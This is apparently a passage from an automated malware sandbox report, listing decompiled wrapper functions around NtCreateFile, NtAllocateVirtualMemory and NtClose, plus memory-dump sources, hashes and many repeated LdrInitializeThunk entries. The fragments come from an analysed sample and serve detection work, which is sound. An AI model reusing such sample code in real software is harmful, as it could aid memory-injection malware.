				_t3 = _t15 + 0xc40; // 0xc40
				E00418DD0(0xec8b5510, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}

0x004181d3
0x004181df
0x004181e7
0x0041821d
0x00418221

APIs

NtCreateFile.NTDLL(00000060,00408B03,?,00413BA7,00408B03,FFFFFFFF,?,?,FFFFFFFF,00408B03,00413BA7,?,00408B03,00000060,00000000,00000000), ref: 0041821D

Memory Dump Source

Source File: 00000005.00000002.2188145697.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: d8a22e9675b5d1ce645307442b25c9e1a5ee1c771a38f76b285ccd204019efb2
Instruction ID: e8a54e390d831606348e0acfbd41f1d0e332c5b8156d92122bab9d4633a8c49c
Opcode Fuzzy Hash: d8a22e9675b5d1ce645307442b25c9e1a5ee1c771a38f76b285ccd204019efb2
Instruction Fuzzy Hash: 42F0C4B2200108AFCB08CF88DC85EEB37A9AF8C354F15824CFA0D97240C630EC51CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004183AA, Relevance: 1.5, APIs: 1, Instructions: 33
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E004183AA(void* __eax, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t16;
				void* _t23;

				asm("stc");
				asm("adc esp, [eax]");
				asm("fcom dword [ebp-0x75]");
				_t12 = _a4;
				_t3 = _t12 + 0xc60; // 0xca0
				E00418DD0(_t23, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t16 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t16;
			}

0x004183ac
0x004183ad
0x004183af
0x004183b3
0x004183bf
0x004183c7
0x004183e9
0x004183ed

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418FA4,?,00000000,?,00003000,00000040,00000000,00000000,00408B03), ref: 004183E9

Memory Dump Source

Source File: 00000005.00000002.2188145697.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b76f9fb9d3364c4e4cd580c1b9ba57fef44b8b70aedd2177da8cc5883f27eae0
Instruction ID: 19bd2812c3df3af814eec6f0528c0ced740112463fdfd164f234e039837e6126
Opcode Fuzzy Hash: b76f9fb9d3364c4e4cd580c1b9ba57fef44b8b70aedd2177da8cc5883f27eae0
Instruction Fuzzy Hash: 9CF05E71600108AFCB14DF99CC81EEB7768FF98350F108148FD1897241C630E811CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 004183B0, Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004183B0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E00418DD0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}

0x004183bf
0x004183c7
0x004183e9
0x004183ed

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418FA4,?,00000000,?,00003000,00000040,00000000,00000000,00408B03), ref: 004183E9

Memory Dump Source

Source File: 00000005.00000002.2188145697.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: 5f1ba135279249ad747bfdca3347611d303f78695a7cb9da664d5d0d2719559c
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: 4EF015B2200208ABCB14DF89DC81EEB77ADAF88754F118249BE0897281C630F810CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004182FA, Relevance: 1.5, APIs: 1, Instructions: 23
nativeCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E004182FA(void* __eax, intOrPtr _a8, void* _a12) {
				long _t10;

				_pop(_t14);
				asm("int1");
				asm("hlt");
				_t13 =  *(__eax + 0x55) * 0xffffff8b;
				_t7 = _a8;
				_t3 = _t7 + 0x10; // 0x300
				_t4 = _t7 + 0xc50; // 0x409753
				E00418DD0(_t13, _a8, _t4,  *_t3, 0, 0x2c);
				_t10 = NtClose(_a12); // executed
				return _t10;
			}

0x004182fa
0x004182fc
0x004182fd
0x004182fe
0x00418303
0x00418306
0x0041830f
0x00418317
0x00418325
0x00418329

APIs

NtClose.NTDLL(00413D40,?,?,00413D40,00408B03,FFFFFFFF), ref: 00418325

Memory Dump Source

Source File: 00000005.00000002.2188145697.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: f2ccf7d02a92d892caaa51b90c80ab6db9bdb2685c75d2d06f96564152211d13
Instruction ID: 0f8be51be6698aaa49d3926cdd5366688ced0272954ae98f6c1522b2a2e0db8a
Opcode Fuzzy Hash: f2ccf7d02a92d892caaa51b90c80ab6db9bdb2685c75d2d06f96564152211d13
Instruction Fuzzy Hash: 57E086761402146FD714DF94DC45EE77B59EF44350F114559F5089B292C530E90086D0

Uniqueness

Uniqueness Score: -1.00%

Function 00418300, Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418300(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409753
				E00418DD0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}

0x00418303
0x00418306
0x0041830f
0x00418317
0x00418325
0x00418329

APIs

NtClose.NTDLL(00413D40,?,?,00413D40,00408B03,FFFFFFFF), ref: 00418325

Memory Dump Source

Source File: 00000005.00000002.2188145697.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: e0948211a995ee673693cff6b37ba25287d5fac55aefcf59dfc2265e20a22c74
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: EAD012752003146BD710EF99DC45ED7775CEF44750F154559BA185B282C570F90086E0

Uniqueness

Uniqueness Score: -1.00%

Function 00C200C4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00C200CF

Memory Dump Source

Source File: 00000005.00000002.2188335788.0000000000C10000.00000040.00000001.sdmp, Offset: 00C00000, based on PE: true

Associated: 00000005.00000002.2188331885.0000000000C00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188380285.0000000000CF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188383966.0000000000D00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188387733.0000000000D04000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188391203.0000000000D07000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188394508.0000000000D10000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188420082.0000000000D70000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846

Uniqueness

Uniqueness Score: -1.00%

Function 00C20048, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00C20053

Memory Dump Source

Source File: 00000005.00000002.2188335788.0000000000C10000.00000040.00000001.sdmp, Offset: 00C00000, based on PE: true

Associated: 00000005.00000002.2188331885.0000000000C00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188380285.0000000000CF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188383966.0000000000D00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188387733.0000000000D04000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188391203.0000000000D07000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188394508.0000000000D10000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188420082.0000000000D70000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A

Uniqueness

Uniqueness Score: -1.00%

Function 00C20078, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00C20086

Memory Dump Source

Source File: 00000005.00000002.2188335788.0000000000C10000.00000040.00000001.sdmp, Offset: 00C00000, based on PE: true

Associated: 00000005.00000002.2188331885.0000000000C00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188380285.0000000000CF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188383966.0000000000D00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188387733.0000000000D04000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188391203.0000000000D07000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188394508.0000000000D10000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188420082.0000000000D70000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B

Uniqueness

Uniqueness Score: -1.00%

Function 00C207AC, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00C207B7

Memory Dump Source

Source File: 00000005.00000002.2188335788.0000000000C10000.00000040.00000001.sdmp, Offset: 00C00000, based on PE: true

Associated: 00000005.00000002.2188331885.0000000000C00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188380285.0000000000CF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188383966.0000000000D00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188387733.0000000000D04000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188391203.0000000000D07000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188394508.0000000000D10000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188420082.0000000000D70000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487

Uniqueness

Uniqueness Score: -1.00%

Function 00C1F9F0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00C1F9FB

Memory Dump Source

Source File: 00000005.00000002.2188335788.0000000000C10000.00000040.00000001.sdmp, Offset: 00C00000, based on PE: true

Associated: 00000005.00000002.2188331885.0000000000C00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188380285.0000000000CF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188383966.0000000000D00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188387733.0000000000D04000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188391203.0000000000D07000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188394508.0000000000D10000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188420082.0000000000D70000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A

Uniqueness

Uniqueness Score: -1.00%

Function 00C1F900, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00C1F90E

Memory Dump Source

Source File: 00000005.00000002.2188335788.0000000000C10000.00000040.00000001.sdmp, Offset: 00C00000, based on PE: true

Associated: 00000005.00000002.2188331885.0000000000C00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188380285.0000000000CF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188383966.0000000000D00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188387733.0000000000D04000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188391203.0000000000D07000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188394508.0000000000D10000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188420082.0000000000D70000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587

Uniqueness

Uniqueness Score: -1.00%

Function 00C1FAD0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00C1FADB

Memory Dump Source

Source File: 00000005.00000002.2188335788.0000000000C10000.00000040.00000001.sdmp, Offset: 00C00000, based on PE: true

Associated: 00000005.00000002.2188331885.0000000000C00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188380285.0000000000CF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188383966.0000000000D00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188387733.0000000000D04000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188391203.0000000000D07000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188394508.0000000000D10000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188420082.0000000000D70000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986

Uniqueness

Uniqueness Score: -1.00%

Function 00C1FAE8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00C1FAF3

Memory Dump Source

Source File: 00000005.00000002.2188335788.0000000000C10000.00000040.00000001.sdmp, Offset: 00C00000, based on PE: true

Associated: 00000005.00000002.2188331885.0000000000C00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188380285.0000000000CF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188383966.0000000000D00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188387733.0000000000D04000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188391203.0000000000D07000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188394508.0000000000D10000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188420082.0000000000D70000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456

Uniqueness

Uniqueness Score: -1.00%

Function 00C1FBB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00C1FBC3

Memory Dump Source

Source File: 00000005.00000002.2188335788.0000000000C10000.00000040.00000001.sdmp, Offset: 00C00000, based on PE: true

Associated: 00000005.00000002.2188331885.0000000000C00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188380285.0000000000CF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188383966.0000000000D00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188387733.0000000000D04000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188391203.0000000000D07000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188394508.0000000000D10000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188420082.0000000000D70000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A

Uniqueness

Uniqueness Score: -1.00%

Function 00C1FB68, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00C1FB73

Memory Dump Source

Source File: 00000005.00000002.2188335788.0000000000C10000.00000040.00000001.sdmp, Offset: 00C00000, based on PE: true

Associated: 00000005.00000002.2188331885.0000000000C00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188380285.0000000000CF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188383966.0000000000D00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188387733.0000000000D04000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188391203.0000000000D07000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188394508.0000000000D10000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188420082.0000000000D70000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446

Uniqueness

Uniqueness Score: -1.00%

Function 00C1FC90, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00C1FC9B

Memory Dump Source

Source File: 00000005.00000002.2188335788.0000000000C10000.00000040.00000001.sdmp, Offset: 00C00000, based on PE: true

Associated: 00000005.00000002.2188331885.0000000000C00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188380285.0000000000CF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188383966.0000000000D00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188387733.0000000000D04000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188391203.0000000000D07000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188394508.0000000000D10000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188420082.0000000000D70000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546

Uniqueness

Uniqueness Score: -1.00%

Function 00C1FC60, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00C1FC6B

Memory Dump Source

Source File: 00000005.00000002.2188335788.0000000000C10000.00000040.00000001.sdmp, Offset: 00C00000, based on PE: true

Associated: 00000005.00000002.2188331885.0000000000C00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188380285.0000000000CF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188383966.0000000000D00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188387733.0000000000D04000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188391203.0000000000D07000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188394508.0000000000D10000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188420082.0000000000D70000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A

Uniqueness

Uniqueness Score: -1.00%

Function 00C1FDC0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00C1FDCB

Memory Dump Source

Source File: 00000005.00000002.2188335788.0000000000C10000.00000040.00000001.sdmp, Offset: 00C00000, based on PE: true

Associated: 00000005.00000002.2188331885.0000000000C00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188380285.0000000000CF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188383966.0000000000D00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188387733.0000000000D04000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188391203.0000000000D07000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188394508.0000000000D10000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188420082.0000000000D70000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486

Uniqueness

Uniqueness Score: -1.00%

Function 00C1FD8C, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00C1FD9A

Memory Dump Source

Source File: 00000005.00000002.2188335788.0000000000C10000.00000040.00000001.sdmp, Offset: 00C00000, based on PE: true

Associated: 00000005.00000002.2188331885.0000000000C00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188380285.0000000000CF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188383966.0000000000D00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188387733.0000000000D04000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188391203.0000000000D07000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188394508.0000000000D10000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188420082.0000000000D70000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686

Uniqueness

Uniqueness Score: -1.00%

Function 00C1FED0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00C1FEDB

Memory Dump Source

Source File: 00000005.00000002.2188335788.0000000000C10000.00000040.00000001.sdmp, Offset: 00C00000, based on PE: true

Associated: 00000005.00000002.2188331885.0000000000C00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188380285.0000000000CF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188383966.0000000000D00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188387733.0000000000D04000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188391203.0000000000D07000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188394508.0000000000D10000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188420082.0000000000D70000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A

Uniqueness

Uniqueness Score: -1.00%

Function 00C1FEA0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00C1FEAB

Memory Dump Source

Source File: 00000005.00000002.2188335788.0000000000C10000.00000040.00000001.sdmp, Offset: 00C00000, based on PE: true

Associated: 00000005.00000002.2188331885.0000000000C00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188380285.0000000000CF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188383966.0000000000D00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188387733.0000000000D04000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188391203.0000000000D07000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188394508.0000000000D10000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188420082.0000000000D70000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
